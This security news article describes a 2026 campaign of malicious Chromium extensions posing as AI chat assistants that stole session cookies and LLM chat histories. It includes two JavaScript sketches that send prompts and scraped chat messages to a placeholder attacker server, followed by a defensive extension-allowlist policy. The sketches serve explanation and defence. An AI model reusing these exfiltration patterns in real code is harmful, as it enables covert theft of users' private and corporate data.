MONDAY, MARCH 16, 2026
AI Security

Over 900,000 Users Tricked by Malicious Chromium Extensions Posing as AI Assistants


Cybersecurity researchers have uncovered a large-scale, coordinated campaign built on malicious browser extensions that masquerade as helpful AI chatbots and productivity assistants. The extensions bypassed official web store security checks and amassed more than 900,000 installations before being removed.

Deceptive Capabilities

The extensions were aggressively marketed as tools that integrate ChatGPT, Claude, and specialized generative AI writing features directly into the browser. While they did provide basic chat functionality (often by proxying requests to legitimate APIs), their primary purpose was silent data harvesting.
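The "proxying" pattern described above can be sketched in a few lines. This is an illustrative reconstruction, not recovered campaign code: both endpoint URLs are hypothetical placeholders, and the injectable `fetchImpl` parameter is added here for clarity.

```javascript
// Illustrative sketch: an extension that "proxies" chats can forward each
// prompt to a legitimate API while silently sending a copy to an
// attacker-controlled server. URLs are hypothetical placeholders.
const CHAT_API = "https://api.example-llm.com/v1/chat";   // legitimate service (placeholder)
const EXFIL_URL = "https://c2.attacker.example/collect";  // attacker C2 (placeholder)

async function proxyChat(prompt, fetchImpl = fetch) {
  // Fire-and-forget copy of the prompt to the C2 server; errors are
  // swallowed so the user never notices a failure.
  fetchImpl(EXFIL_URL, {
    method: "POST",
    body: JSON.stringify({ prompt }),
  }).catch(() => {});

  // Forward the prompt to the real API so the advertised feature works.
  const res = await fetchImpl(CHAT_API, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ prompt }),
  });
  return res.json();
}
```

Because the user still receives a genuine model response, the theft is invisible in normal use.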

Advertised Features

  • In-browser AI chat
  • Content summarization
  • Grammar correction

Hidden Malicious Actions

  • Stealing session cookies
  • Harvesting LLM chat history
  • Injecting affiliate links

The Threat to Enterprise Data

The most concerning aspect of this campaign is its targeting of LLM chat content. Employees frequently input sensitive corporate data, source code, and strategic documents into AI chatbots. These malicious extensions silently monitored the DOM and exfiltrated raw chat histories to external command-and-control servers.
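The DOM-monitoring technique described above typically relies on a `MutationObserver` that captures each chat bubble as it is rendered. The sketch below is hypothetical: the CSS class marker, node shape, and exfiltration endpoint are placeholders, since real chat UIs differ.

```javascript
// Illustrative sketch of the DOM-scraping pattern (not recovered campaign
// code). The "chat-message" class marker and the C2 URL are hypothetical.
function extractMessageTexts(nodes, marker = "chat-message") {
  // Pull the text of any node whose class list contains the marker.
  return nodes
    .filter((n) => (n.className || "").split(/\s+/).includes(marker))
    .map((n) => n.textContent.trim())
    .filter((t) => t.length > 0);
}

// In a content script, the helper would be wired to a MutationObserver so
// every newly rendered chat message is captured and beaconed out.
if (typeof MutationObserver !== "undefined" && typeof document !== "undefined") {
  const observer = new MutationObserver((mutations) => {
    const added = mutations.flatMap((m) => Array.from(m.addedNodes));
    const texts = extractMessageTexts(added);
    if (texts.length > 0) {
      // Exfiltration endpoint is a placeholder.
      navigator.sendBeacon("https://c2.attacker.example/logs", JSON.stringify(texts));
    }
  });
  observer.observe(document.body, { childList: true, subtree: true });
}
```

Because the observer reads the rendered page rather than network traffic, TLS and API-side protections offer no defense once the extension is installed.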

Corporate Defense Recommendation

Enterprises should strictly enforce browser extension allowlists through Group Policy or MDM solutions, explicitly banning unauthorized "AI assistant" plugins that request broad "read and change all your data on all websites" permissions.
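On managed Chromium browsers, such an allowlist can be expressed with the `ExtensionSettings` policy (deployed via Group Policy on Windows or a managed-policy JSON file on Linux/macOS). A minimal sketch, assuming a default-deny posture; the 32-character extension ID below is a placeholder for an approved extension:

```json
{
  "ExtensionSettings": {
    "*": {
      "installation_mode": "blocked",
      "blocked_install_message": "Contact IT to request an extension review."
    },
    "aaaabbbbccccddddeeeeffffgggghhhh": {
      "installation_mode": "allowed"
    }
  }
}
```

The wildcard entry blocks all extensions by default, so anything not explicitly allowlisted, including lookalike "AI assistant" plugins, cannot be installed.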